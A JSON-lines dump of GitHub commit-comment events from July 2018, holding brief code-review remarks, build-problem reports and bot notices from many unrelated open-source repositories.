{"id":"8011278947","type":"CommitCommentEvent","actor":{"login":"dasefip2"},"repo":{"name":"dasefip2/Web1"},"payload":{"comment":{"id":29816661,"position":14,"line":14,"path":"CSS.html","commit_id":"b3e36b2fbad3347cf6d91c7bcc636ed158a7f57d","created_at":"2018-07-24T16:17:32Z","updated_at":"2018-07-24T16:17:32Z","author_association":"OWNER","body":"<h1><a href=\"index.html\"title=\"웰컴 페이지\">WEB</a></h1>\r\n  <ol>\r\n    <li><a href=\"HTML.html\"title=\"HTML페이지\">HTML</a></li>\r\n    <li><a href=\"CSS.html\"title=\"CSS페이지\">CSS</a></li>\r\n    <li><a href=\"JavaScript.html\"title=\"JavaScript페이지\">JavaScript</a></li>\r\n  </ol>\r\n  <a href=\"생활코딩.html\">사진 보러가기</a><br>"}},"created_at":"2018-07-24T16:17:32Z"}
{"id":"8011280412","type":"CommitCommentEvent","actor":{"login":"monchitos82"},"repo":{"name":"bcoca/ansible"},"payload":{"comment":{"id":29816664,"position":null,"line":null,"path":null,"commit_id":"472495aad74f62da41160779490a8961d232768b","created_at":"2018-07-24T16:17:47Z","updated_at":"2018-07-24T16:17:47Z","author_association":"NONE","body":"Hi @bcoca, I found the code has the same flaw in:\r\n* `auto.py` line 36\r\n* `aws_ec2.py` line 465\r\n* `foreman.py` line 85\r\n* `openstack.py` line 306\r\n* `virtualbox.py` line 204"}},"created_at":"2018-07-24T16:17:47Z"}
{"id":"8011281615","type":"CommitCommentEvent","actor":{"login":"cpinter"},"repo":{"name":"Slicer/Slicer"},"payload":{"comment":{"id":29816667,"position":98,"line":98,"path":"Modules/Loadable/Segmentations/Logic/vtkSlicerSegmentationGeometryLogic.h","commit_id":"6a8012e30952ff7e990956f11a892349387cd974","created_at":"2018-07-24T16:17:59Z","updated_at":"2018-07-24T16:17:59Z","author_association":"CONTRIBUTOR","body":"Thanks! Indeed, \"box\" is not even correct. I'll fix this when I add a bit more checks to the automated test soon."}},"created_at":"2018-07-24T16:17:59Z"}
{"id":"8011287696","type":"CommitCommentEvent","actor":{"login":"f608253"},"repo":{"name":"f608253/Jenkins_Pipieline"},"payload":{"comment":{"id":29816675,"position":null,"line":null,"path":null,"commit_id":"b02e29c763f8763cb509b662d45ebe965ab64fda","created_at":"2018-07-24T16:19:02Z","updated_at":"2018-07-24T16:19:02Z","author_association":"OWNER","body":"na"}},"created_at":"2018-07-24T16:19:02Z"}
{"id":"8011288139","type":"CommitCommentEvent","actor":{"login":"rjhintz"},"repo":{"name":"salexpdx/og-aws"},"payload":{"comment":{"id":29816678,"position":null,"line":null,"path":null,"commit_id":"5d65fa431ac56a301db26a955a1cc78b077d6507","created_at":"2018-07-24T16:19:07Z","updated_at":"2018-07-24T16:19:07Z","author_association":"NONE","body":"Couple of typos:\r\n\r\n- noisey\r\n- tennancy\r\n\r\nBut I wonder if Noisy Neighbor is still an actual issue. Even when I added this last year there seemed to be a general feeling that, while it may have been a problem years ago (several of my references are years old), it's not that big a deal now. Perhaps, as the one ref contends , it's mostly FUD.\r\n\r\nAlso, I'm not sure the last sentence about dedicated tenancy. How is a physical server coming under maintenance more of a concern than any other hosting server coming under maintenance?"}},"created_at":"2018-07-24T16:19:07Z"}
{"id":"8011289508","type":"CommitCommentEvent","actor":{"login":"NicholasBarreyre"},"repo":{"name":"NicholasBarreyre/magenta"},"payload":{"comment":{"id":29816685,"position":null,"line":null,"path":null,"commit_id":"8e85b9b5188a4d981f3cbe87e92d457a330926b0","created_at":"2018-07-24T16:19:21Z","updated_at":"2018-07-24T16:19:21Z","author_association":"OWNER","body":"@osageev This is what the new control signals look like. "}},"created_at":"2018-07-24T16:19:21Z"}
{"id":"8011290351","type":"CommitCommentEvent","actor":{"login":"boogheta"},"repo":{"name":"regardscitoyens/the-law-factory-parser"},"payload":{"comment":{"id":29816687,"position":8,"line":240,"path":"tlfp/tools/parse_texte.py","commit_id":"398ad84ca7a5b516cfafed75f0b5e99a90f7198e","created_at":"2018-07-24T16:19:30Z","updated_at":"2018-07-24T16:19:30Z","author_association":"CONTRIBUTOR","body":"raise maybe here?"}},"created_at":"2018-07-24T16:19:30Z"}
{"id":"8011293365","type":"CommitCommentEvent","actor":{"login":"omkashyap15"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29816694,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-24T16:20:01Z","updated_at":"2018-07-24T16:20:01Z","author_association":"NONE","body":"awesome project"}},"created_at":"2018-07-24T16:20:01Z"}
{"id":"8011304438","type":"CommitCommentEvent","actor":{"login":"TwolDE"},"repo":{"name":"oe-alliance/oe-alliance-core"},"payload":{"comment":{"id":29816719,"position":null,"line":null,"path":null,"commit_id":"afe211244c8c3ef9226f0d0b5b64c962aa97372e","created_at":"2018-07-24T16:21:55Z","updated_at":"2018-07-24T16:21:55Z","author_association":"NONE","body":"I am sure I must be doing something wrong, but the only way I can get builds to finish is by reverting this change and running with  the previous PREFERRED_VERSION_automake = \"1.15.1\" tweak.\r\nHD51 & Giga 4K receivers."}},"created_at":"2018-07-24T16:21:55Z"}
{"id":"8011305118","type":"CommitCommentEvent","actor":{"login":"chuk-chuk"},"repo":{"name":"chuk-chuk/remindersAPI"},"payload":{"comment":{"id":29816720,"position":42,"line":42,"path":"test.js","commit_id":"1a297f3076a095651b68b95d10433d48aff7871c","created_at":"2018-07-24T16:22:03Z","updated_at":"2018-07-24T16:22:03Z","author_association":"OWNER","body":"Can I stub the data and don't connect to the DB?"}},"created_at":"2018-07-24T16:22:03Z"}
{"id":"8011308570","type":"CommitCommentEvent","actor":{"login":"Allofich"},"repo":{"name":"Interkarma/daggerfall-unity"},"payload":{"comment":{"id":29816727,"position":14,"line":312,"path":"Assets/Scripts/Game/PlayerEnterExit.cs","commit_id":"b02c1dee1c2f22e245aa98782d5792eebd501ad2","created_at":"2018-07-24T16:22:40Z","updated_at":"2018-07-24T16:22:40Z","author_association":"CONTRIBUTOR","body":"This being commented out causes some problems. Get submerged in water and then load a game out of water, and the player will still be slowed down to water movement speed. This might also lead to problems with teleport spells when used while swimming, etc."}},"created_at":"2018-07-24T16:22:40Z"}
{"id":"8011309715","type":"CommitCommentEvent","actor":{"login":"ayyazdaniaryan"},"repo":{"name":"assembl/assembl"},"payload":{"comment":{"id":29816730,"position":15,"line":91,"path":"assembl/models/action.py","commit_id":"f5bdfddf1cd0d8f27506b72acca3671fdaa7cf13","created_at":"2018-07-24T16:22:52Z","updated_at":"2018-07-24T16:22:52Z","author_association":"MEMBER","body":"You should also add the subclasses `Reject...OnDiscussion`, as these are also real events to be tracked"}},"created_at":"2018-07-24T16:22:52Z"}
{"id":"8011349049","type":"CommitCommentEvent","actor":{"login":"andreystarkov"},"repo":{"name":"it-spectre-ru/the-last-chance"},"payload":{"comment":{"id":29816803,"position":null,"line":null,"path":null,"commit_id":"26f4b87268d7cc8afab91d8b03c2ed056f1bd0a7","created_at":"2018-07-24T16:30:00Z","updated_at":"2018-07-24T16:30:00Z","author_association":"CONTRIBUTOR","body":"If you will follow this way -- this last chance will last forever. JUST RTFM"}},"created_at":"2018-07-24T16:30:00Z"}
{"id":"8011352059","type":"CommitCommentEvent","actor":{"login":"ayyazdaniaryan"},"repo":{"name":"assembl/assembl"},"payload":{"comment":{"id":29816814,"position":29,"line":645,"path":"assembl/models/auth.py","commit_id":"f5bdfddf1cd0d8f27506b72acca3671fdaa7cf13","created_at":"2018-07-24T16:30:33Z","updated_at":"2018-07-24T16:30:33Z","author_association":"MEMBER","body":"You should use the new `read_cookies` property I suggested, and check that the cookie key is in there. If so, append to this property FIRST. Then write into the `self.accepted_cookies` with:\r\n```\r\nself.accepted_cookies = \", \".join(self.read_cookies)\r\n```"}},"created_at":"2018-07-24T16:30:33Z"}
{"id":"8011354729","type":"CommitCommentEvent","actor":{"login":"AndyGrant"},"repo":{"name":"protonspring/Stockfish"},"payload":{"comment":{"id":29816822,"position":null,"line":null,"path":null,"commit_id":"31089b8bc23e4bd98665e60884a4b91abde3914e","created_at":"2018-07-24T16:31:04Z","updated_at":"2018-07-24T16:31:04Z","author_association":"NONE","body":"I'll just note my objection to this being a simplification. Carry on with the test. Assuming it passes, then this conversation will be had. "}},"created_at":"2018-07-24T16:31:04Z"}
{"id":"8011356050","type":"CommitCommentEvent","actor":{"login":"Exenu"},"repo":{"name":"ProjectSkyfire/SkyFire.548"},"payload":{"comment":{"id":29816824,"position":null,"line":null,"path":null,"commit_id":"4106b86675e9ed39d8559f055c27d88bbd8ae7e1","created_at":"2018-07-24T16:31:18Z","updated_at":"2018-07-24T16:31:18Z","author_association":"NONE","body":"What's the reason behind this?"}},"created_at":"2018-07-24T16:31:18Z"}
{"id":"8011357514","type":"CommitCommentEvent","actor":{"login":"colinhowells"},"repo":{"name":"wesbos/React-For-Beginners-Starter-Files"},"payload":{"comment":{"id":29816826,"position":null,"line":null,"path":null,"commit_id":"2303f828ed2571a0fa2f77179b977e25ea6a29c0","created_at":"2018-07-24T16:31:34Z","updated_at":"2018-07-24T16:31:34Z","author_association":"NONE","body":"[re-base was just updated to 4.0.0](https://github.com/tylermcginnis/re-base/commit/16d0e4fd8e97b2bcad02ec0b9817cf44e1256ab3) which seems to have solved the new-Node/dependency issues 🎉"}},"created_at":"2018-07-24T16:31:34Z"}
{"id":"8011360247","type":"CommitCommentEvent","actor":{"login":"abdull2bk"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29816830,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-24T16:32:06Z","updated_at":"2018-07-24T16:32:06Z","author_association":"NONE","body":"nice project "}},"created_at":"2018-07-24T16:32:06Z"}
{"id":"8011361278","type":"CommitCommentEvent","actor":{"login":"ayyazdaniaryan"},"repo":{"name":"assembl/assembl"},"payload":{"comment":{"id":29816831,"position":36,"line":652,"path":"assembl/models/auth.py","commit_id":"f5bdfddf1cd0d8f27506b72acca3671fdaa7cf13","created_at":"2018-07-24T16:32:18Z","updated_at":"2018-07-24T16:32:18Z","author_association":"MEMBER","body":"Again, using the `read_cookies` property, you can pop the cookie from the list and set it like the previous comment. It's much cleaner to use data-structures than to manipulate strings for cookies. What goes to the database will be a string, but on the application layer, let's deal with a list of Enum types."}},"created_at":"2018-07-24T16:32:18Z"}
{"id":"8011366692","type":"CommitCommentEvent","actor":{"login":"ayyazdaniaryan"},"repo":{"name":"assembl/assembl"},"payload":{"comment":{"id":29816842,"position":53,"line":944,"path":"assembl/models/auth.py","commit_id":"f5bdfddf1cd0d8f27506b72acca3671fdaa7cf13","created_at":"2018-07-24T16:33:15Z","updated_at":"2018-07-24T16:33:15Z","author_association":"MEMBER","body":"`all_cookie_accepted_agents`"}},"created_at":"2018-07-24T16:33:15Z"}
{"id":"8011367788","type":"CommitCommentEvent","actor":{"login":"ayyazdaniaryan"},"repo":{"name":"assembl/assembl"},"payload":{"comment":{"id":29816843,"position":62,"line":953,"path":"assembl/models/auth.py","commit_id":"f5bdfddf1cd0d8f27506b72acca3671fdaa7cf13","created_at":"2018-07-24T16:33:27Z","updated_at":"2018-07-24T16:33:27Z","author_association":"MEMBER","body":"`all_rejected_cookie_agents`"}},"created_at":"2018-07-24T16:33:27Z"}
{"id":"8011367975","type":"CommitCommentEvent","actor":{"login":"KapiX"},"repo":{"name":"haikuports/haikuports"},"payload":{"comment":{"id":29816844,"position":10,"line":10,"path":"app-text/libexttextcat/libexttextcat-3.4.5.recipe","commit_id":"7a829f54e405936ffba2f1b7efa1987fe71668e8","created_at":"2018-07-24T16:33:29Z","updated_at":"2018-07-24T16:33:29Z","author_association":"MEMBER","body":"I don't think so. If any customizations exist, they are in core libreoffice repo: https://cgit.freedesktop.org/libreoffice/core/tree/external"}},"created_at":"2018-07-24T16:33:29Z"}
{"id":"8011368815","type":"CommitCommentEvent","actor":{"login":"velhbxtyrj"},"repo":{"name":"Shadowss/TravianZ"},"payload":{"comment":{"id":29816847,"position":null,"line":null,"path":null,"commit_id":"77136a97841afc7697db21e2c2606db86510bbab","created_at":"2018-07-24T16:33:39Z","updated_at":"2018-07-24T16:33:39Z","author_association":"COLLABORATOR","body":"3.Geography of scatter of artifacts\r\n\r\nUnique artifacts are thrown uniformly along the circumference with a radius of 0.186 from the radius of the server's population. The order of the location of the uniques in this sequence: Notes of Archimedes, Chariot of Helios, King Arthur's Cup, Notes of Alexander the Great, Trojan Horse, Brenna's Cloak, Burnt Manuscript (b). Clockwise, the rotation angle is random ie. It is impossible to tell in advance in which part of the server the artifact of the Archimedes Note will be, but it is precisely known that it will be across the center from the Notes of Alexander the Great and the Trojan Horse.\r\nThe remaining artifacts when they appear on the server correspond to the following indicators:\r\nFor clarity, I'll give you a map of the scatter of artifacts.\r\n\r\n![7825](https://user-images.githubusercontent.com/21306412/43151636-152393f4-8f75-11e8-9ecd-ff38bd8ae101.jpg)\r\n\r\n\"Picture\" is always the same, only the scale changes - in proportion to the server population and the rotation angle (random). In the center, as already mentioned above, on a radius of 18.6%R - 7 unique artifacts. Then by 30%R - 4 Dorian hammers, etc.\r\n\r\nThe inscriptions on the picture:\r\n18.6%R - Unique Artifacts;\r\n67%R - Underground temple;\r\n100%R - Diamond chisel.\r\n\r\nMore pictures with the placement of artifacts:\r\n\r\n![a536e88dbafa174d1e0d5a4c6d4ab681](https://user-images.githubusercontent.com/21306412/43152806-3606ffb8-8f78-11e8-930f-f85267026842.jpg)\r\n![tf1tip9](https://user-images.githubusercontent.com/21306412/43152807-362f0620-8f78-11e8-9d5f-cb8478343549.jpg)\r\n![svbprsc](https://user-images.githubusercontent.com/21306412/43152808-366cf44e-8f78-11e8-9cfd-b52a4791b951.jpg)\r\n![bnzbj](https://user-images.githubusercontent.com/21306412/43152811-36e9ccd0-8f78-11e8-81be-38cf1fe232f8.png)\r\n\r\n\r\nI hope this is useful information ;)"}},"created_at":"2018-07-24T16:33:39Z"}
{"id":"8011369913","type":"CommitCommentEvent","actor":{"login":"whyang0808"},"repo":{"name":"whyang0808/learning-css"},"payload":{"comment":{"id":29816851,"position":4,"line":9,"path":"index.html","commit_id":"6153c932295df02177011f4e0c105ac28e3e03fe","created_at":"2018-07-24T16:33:51Z","updated_at":"2018-07-24T16:33:51Z","author_association":"OWNER","body":"The commented part below is `style` tag example. This will be removed later."}},"created_at":"2018-07-24T16:33:51Z"}
{"id":"8011370963","type":"CommitCommentEvent","actor":{"login":"Sleitnick"},"repo":{"name":"Sleitnick/AeroGameFramework"},"payload":{"comment":{"id":29816853,"position":null,"line":null,"path":null,"commit_id":"4a6b9b73f21738f086210e96fd2077731213a2cd","created_at":"2018-07-24T16:34:03Z","updated_at":"2018-07-24T16:34:03Z","author_association":"OWNER","body":"@Dog2puppy nope. It uses the `SafeDataStore` module (under Server > Modules > DataStoreCache), which is a wrapper for DataStores but uses pcall and does automatic retries on fails."}},"created_at":"2018-07-24T16:34:03Z"}
{"id":"8011372900","type":"CommitCommentEvent","actor":{"login":"ayyazdaniaryan"},"repo":{"name":"assembl/assembl"},"payload":{"comment":{"id":29816855,"position":53,"line":944,"path":"assembl/models/auth.py","commit_id":"f5bdfddf1cd0d8f27506b72acca3671fdaa7cf13","created_at":"2018-07-24T16:34:24Z","updated_at":"2018-07-24T16:34:24Z","author_association":"MEMBER","body":"Also, you should have this method per discussion. A global one has less meaning."}},"created_at":"2018-07-24T16:34:24Z"}
{"id":"8011376645","type":"CommitCommentEvent","actor":{"login":"janschreiber"},"repo":{"name":"languagetool-org/languagetool"},"payload":{"comment":{"id":29816862,"position":61,"line":25834,"path":"languagetool-language-modules/de/src/main/resources/org/languagetool/resource/de/hunspell/spelling.txt","commit_id":"9d94c1fc3ff1311206f962c1518cb559a0568b9c","created_at":"2018-07-24T16:35:05Z","updated_at":"2018-07-24T16:35:05Z","author_association":"MEMBER","body":"@Discostu36: Deine Ideen finde ich durchaus richtig. Wir wurschteln uns hier seit Jahren irgendwie durch, aber es gibt ganz grundlegende Probleme, die wir nicht gelöst haben und vielleicht auch nicht lösen können.\r\nZum aktuellen Problem: \"Lick\" steht nicht im Duden, das ist für mich ein gutes Argument."}},"created_at":"2018-07-24T16:35:05Z"}
{"id":"8011377101","type":"CommitCommentEvent","actor":{"login":"ryantrinkle"},"repo":{"name":"reflex-frp/reflex-platform"},"payload":{"comment":{"id":29816863,"position":null,"line":null,"path":null,"commit_id":"26289499acd98fcaca410214780238e6247bce4d","created_at":"2018-07-24T16:35:10Z","updated_at":"2018-07-24T16:35:10Z","author_association":"MEMBER","body":"Why do we need to null things out here?"}},"created_at":"2018-07-24T16:35:10Z"}
{"id":"8011379082","type":"CommitCommentEvent","actor":{"login":"finger6004"},"repo":{"name":"Microsoft/pxt"},"payload":{"comment":{"id":29816865,"position":4,"line":358,"path":"libs/pxt-common/pxt-helpers.ts","commit_id":"724b7cf6ced99e1cb871d1b89ff198c7439c30fd","created_at":"2018-07-24T16:35:31Z","updated_at":"2018-07-24T16:35:31Z","author_association":"NONE","body":"gu"}},"created_at":"2018-07-24T16:35:31Z"}
{"id":"8011379806","type":"CommitCommentEvent","actor":{"login":"ayyazdaniaryan"},"repo":{"name":"assembl/assembl"},"payload":{"comment":{"id":29816866,"position":44,"line":704,"path":"assembl/models/auth.py","commit_id":"f5bdfddf1cd0d8f27506b72acca3671fdaa7cf13","created_at":"2018-07-24T16:35:39Z","updated_at":"2018-07-24T16:35:39Z","author_association":"MEMBER","body":"In the CGU accepted mutation, please update this field on the agent. "}},"created_at":"2018-07-24T16:35:39Z"}
{"id":"8011380038","type":"CommitCommentEvent","actor":{"login":"whyang0808"},"repo":{"name":"whyang0808/learning-css"},"payload":{"comment":{"id":29816867,"position":null,"line":null,"path":null,"commit_id":"6153c932295df02177011f4e0c105ac28e3e03fe","created_at":"2018-07-24T16:35:42Z","updated_at":"2018-07-24T16:35:42Z","author_association":"OWNER","body":"[css-syntax.pdf](https://github.com/whyang0808/learning-css/files/2224534/css-syntax.pdf)\r\n"}},"created_at":"2018-07-24T16:35:42Z"}
{"id":"8011381393","type":"CommitCommentEvent","actor":{"login":"ayyazdaniaryan"},"repo":{"name":"assembl/assembl"},"payload":{"comment":{"id":29816871,"position":null,"line":null,"path":null,"commit_id":"f5bdfddf1cd0d8f27506b72acca3671fdaa7cf13","created_at":"2018-07-24T16:35:56Z","updated_at":"2018-07-24T16:35:56Z","author_association":"MEMBER","body":"Should commit the alembic migration along with these model changes as well."}},"created_at":"2018-07-24T16:35:56Z"}
{"id":"8011385367","type":"CommitCommentEvent","actor":{"login":"jhackett1"},"repo":{"name":"jhackett1/learn-to-code"},"payload":{"comment":{"id":29816878,"position":null,"line":null,"path":null,"commit_id":"aaaa327e7937858fe825ac310dfbc234034d7bb6","created_at":"2018-07-24T16:36:41Z","updated_at":"2018-07-24T16:36:41Z","author_association":"OWNER","body":"I'd misconfigured one of the plugins. Fixed in the next commit."}},"created_at":"2018-07-24T16:36:41Z"}
{"id":"8011386437","type":"CommitCommentEvent","actor":{"login":"luckyruby1006"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29816882,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-24T16:36:53Z","updated_at":"2018-07-24T16:36:53Z","author_association":"NONE","body":"nice\n\n\nOn Tue, Jul 24, 2018 at 9:32 AM, abdull2bk <notifications@github.com> wrote:\n\n> nice project\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/iride2020/iRide-Token/commit/8f810b3700a24de0ee4f945ef84be7b2f1605610#commitcomment-29816830>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/Anq0mvQQlwYj4Ig42ORBT1iQQjUfEbTTks5uJ0wvgaJpZM4VaEAl>\n> .\n>\n"}},"created_at":"2018-07-24T16:36:53Z"}
{"id":"8011394249","type":"CommitCommentEvent","actor":{"login":"ayyazdaniaryan"},"repo":{"name":"assembl/assembl"},"payload":{"comment":{"id":29816892,"position":27,"line":643,"path":"assembl/models/auth.py","commit_id":"f5bdfddf1cd0d8f27506b72acca3671fdaa7cf13","created_at":"2018-07-24T16:38:21Z","updated_at":"2018-07-24T16:38:21Z","author_association":"MEMBER","body":"Also, if it's not clear, you should create an Enum type of the types of cookies somewhere. And reference it."}},"created_at":"2018-07-24T16:38:21Z"}
{"id":"8011397786","type":"CommitCommentEvent","actor":{"login":"eskatos"},"repo":{"name":"gradle/gradle"},"payload":{"comment":{"id":29816897,"position":null,"line":null,"path":null,"commit_id":"b42cd6a9b2dbefbdad7976d973dee8549aae1ab2","created_at":"2018-07-24T16:39:01Z","updated_at":"2018-07-24T16:39:01Z","author_association":"MEMBER","body":"👍 "}},"created_at":"2018-07-24T16:39:01Z"}
{"id":"8011399041","type":"CommitCommentEvent","actor":{"login":"ganislp"},"repo":{"name":"BalaramaRajuRudraraju/PMVReporting"},"payload":{"comment":{"id":29816901,"position":null,"line":null,"path":null,"commit_id":"f1ff0af5e9b0dff9b276ccca8a5025686801435e","created_at":"2018-07-24T16:39:16Z","updated_at":"2018-07-24T16:39:16Z","author_association":"COLLABORATOR","body":"db.json added"}},"created_at":"2018-07-24T16:39:16Z"}
{"id":"8011400658","type":"CommitCommentEvent","actor":{"login":"Cazzar"},"repo":{"name":"ShokoAnime/ShokoServer"},"payload":{"comment":{"id":29816906,"position":null,"line":null,"path":null,"commit_id":"3a560e6f9c74f737e651121d05765de342fe46e9","created_at":"2018-07-24T16:39:32Z","updated_at":"2018-07-24T16:39:32Z","author_association":"CONTRIBUTOR","body":"@BigRetroMike you should read up on the git-clone manpage more.\r\n\r\n`git clone -b NetStandard20 --recursive https://github.com/ShokoAnime/ShokoServer.git`\r\n\r\n"}},"created_at":"2018-07-24T16:39:32Z"}
{"id":"8011404152","type":"CommitCommentEvent","actor":{"login":"mweirauch"},"repo":{"name":"micrometer-metrics/micrometer"},"payload":{"comment":{"id":29816909,"position":4,"line":66,"path":"micrometer-core/src/main/java/io/micrometer/core/instrument/binder/system/UptimeMetrics.java","commit_id":"5632cd4b9b534cb192791f6021ddd6f811cf34c0","created_at":"2018-07-24T16:40:10Z","updated_at":"2018-07-24T16:40:10Z","author_association":"COLLABORATOR","body":"Can you please share your setup of PG and Prom (configs, versions) in a new issue and link the old one (or a PR) which should mitigate the issues you have?\r\nAlso please elaborate if this actually leads to the same issues as before `1.0.6` or if with `1.0.5` different PG pull issues have been present. (I'd assume they are identical)\r\nThanks!\r\n\r\nWe are using the PG just fine and I am wondering what the problem might be."}},"created_at":"2018-07-24T16:40:10Z"}
{"id":"8011409765","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29816918,"position":null,"line":null,"path":null,"commit_id":"da2fb392cb4ed3b6112c7bb8f5e77ed4dc3f25fb","created_at":"2018-07-24T16:41:11Z","updated_at":"2018-07-24T16:41:11Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-904](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-904).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-904-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-24T16:41:11Z"}
{"id":"8011410420","type":"CommitCommentEvent","actor":{"login":"vincentfretin"},"repo":{"name":"assembl/assembl"},"payload":{"comment":{"id":29816919,"position":27,"line":27,"path":"assembl/alembic/versions/8d37745a8e69_add_tables_and_columns_for_cookie_.py","commit_id":"6a09427ceb5067940cee3ad63eccc4cb83401cfb","created_at":"2018-07-24T16:41:19Z","updated_at":"2018-07-24T16:41:19Z","author_association":"CONTRIBUTOR","body":"You forgot the foreign key, and it's very very important to have it here!"}},"created_at":"2018-07-24T16:41:19Z"}
{"id":"8011411592","type":"CommitCommentEvent","actor":{"login":"bigretromike"},"repo":{"name":"ShokoAnime/ShokoServer"},"payload":{"comment":{"id":29816920,"position":null,"line":null,"path":null,"commit_id":"3a560e6f9c74f737e651121d05765de342fe46e9","created_at":"2018-07-24T16:41:33Z","updated_at":"2018-07-24T16:41:33Z","author_association":"CONTRIBUTOR","body":"nah, im not talking about NetStandard, and I dont have problem with recursive submodule update. When you clean clone server and try to build it there is error with post-compile xcopy, and as Its one cmd with many xcopy's I assume that the one with /hasher/bin/Debug_x64/*.dll is exiting with code 4 because hasher ain't liked in vs .csproject so no debug dll is compiled."}},"created_at":"2018-07-24T16:41:33Z"}
{"id":"8011413350","type":"CommitCommentEvent","actor":{"login":"k3yavi"},"repo":{"name":"COMBINE-lab/salmon"},"payload":{"comment":{"id":29816922,"position":4,"line":4,"path":"include/AlevinKmer.hpp","commit_id":"1cb07c41bbd3a09249e79be5fad2ec78af1edd6d","created_at":"2018-07-24T16:41:52Z","updated_at":"2018-07-24T16:41:52Z","author_association":"COLLABORATOR","body":"Sure, will do. Already looks like awesome update !"}},"created_at":"2018-07-24T16:41:52Z"}
{"id":"8011420480","type":"CommitCommentEvent","actor":{"login":"leofishc"},"repo":{"name":"leofishc/vector-quantization-image-compression"},"payload":{"comment":{"id":29816948,"position":null,"line":null,"path":null,"commit_id":"d011631ec626f468b1b48a4b4308a1d8fae2037c","created_at":"2018-07-24T16:43:13Z","updated_at":"2018-07-24T16:43:13Z","author_association":"OWNER","body":"transfer from github enterprise"}},"created_at":"2018-07-24T16:43:13Z"}
{"id":"8011422042","type":"CommitCommentEvent","actor":{"login":"Cazzar"},"repo":{"name":"ShokoAnime/ShokoServer"},"payload":{"comment":{"id":29816953,"position":null,"line":null,"path":null,"commit_id":"3a560e6f9c74f737e651121d05765de342fe46e9","created_at":"2018-07-24T16:43:31Z","updated_at":"2018-07-24T16:43:31Z","author_association":"CONTRIBUTOR","body":"Remove the line then?\n\nOn Wed., 25 Jul. 2018, 2:41 am BigRetroMike, <notifications@github.com>\nwrote:\n\n> nah, im not talking about NetStandard, and I dont have problem with\n> recursive submodule update. When you clean clone server and try to build it\n> there is error with post-compile xcopy, and as Its one cmd with many\n> xcopy's I assume that the one with /hasher/bin/Debug_x64/*.dll is exiting\n> with code 4 because hasher ain't liked in vs .csproject so no debug dll is\n> compiled.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/ShokoAnime/ShokoServer/commit/3a560e6f9c74f737e651121d05765de342fe46e9#commitcomment-29816920>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AA8rprP04qiPr0lVzmmSplYCR-qdBypRks5uJ049gaJpZM4VcVcr>\n> .\n>\n"}},"created_at":"2018-07-24T16:43:31Z"}
{"id":"8011427365","type":"CommitCommentEvent","actor":{"login":"phipag"},"repo":{"name":"mailcow/mailcow-dockerized"},"payload":{"comment":{"id":29816961,"position":null,"line":null,"path":null,"commit_id":"fd91692335151d6e6d3c0fb55e2d67c2ee678595","created_at":"2018-07-24T16:44:30Z","updated_at":"2018-07-24T16:44:30Z","author_association":"NONE","body":"Thanks. This jqplot was really bad 👍 "}},"created_at":"2018-07-24T16:44:30Z"}
{"id":"8011431188","type":"CommitCommentEvent","actor":{"login":"aoompoo"},"repo":{"name":"heagoo/apkeditor_plugin_translation"},"payload":{"comment":{"id":29816969,"position":1,"line":1,"path":"README.md","commit_id":"ab46b9430d0e381407f446859fa04b2d821c4338","created_at":"2018-07-24T16:45:12Z","updated_at":"2018-07-24T16:45:12Z","author_association":"NONE","body":"D"}},"created_at":"2018-07-24T16:45:12Z"}
{"id":"8011431597","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29816971,"position":null,"line":null,"path":null,"commit_id":"aa2e997b3d72018e95fa8355e30e94298593b6c7","created_at":"2018-07-24T16:45:16Z","updated_at":"2018-07-24T16:45:16Z","author_association":"NONE","body":"<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-aa2e997b3d72018e95fa8355e30e94298593b6c7-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>Unhandled Failure</a>\n"}},"created_at":"2018-07-24T16:45:16Z"}
{"id":"8011432787","type":"CommitCommentEvent","actor":{"login":"grshane"},"repo":{"name":"wvu-online/wvuonline"},"payload":{"comment":{"id":29816977,"position":null,"line":null,"path":null,"commit_id":"6aa410b0859a9350fc9761f7debd0e9b250d4d68","created_at":"2018-07-24T16:45:29Z","updated_at":"2018-07-24T16:45:29Z","author_association":"COLLABORATOR","body":"Created multidev environment [wvuonline#ci-361](https://dashboard.pantheon.io/sites/8fb52aa5-5525-4d73-9b84-f2d86faf1da2#ci-361).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-361-wvuonline.pantheonsite.io/)"}},"created_at":"2018-07-24T16:45:29Z"}
{"id":"8011436371","type":"CommitCommentEvent","actor":{"login":"yungsters"},"repo":{"name":"facebook/fbjs"},"payload":{"comment":{"id":29816981,"position":118,"line":93,"path":"packages/babel-preset-fbjs/plugins/inline-requires.js","commit_id":"5a5351b0872df9e1a5e6bce6838a82986011fdef","created_at":"2018-07-24T16:46:10Z","updated_at":"2018-07-24T16:46:10Z","author_association":"CONTRIBUTOR","body":"How does this new version of the plugin work if it never visits `Identifier` nodes?"}},"created_at":"2018-07-24T16:46:10Z"}
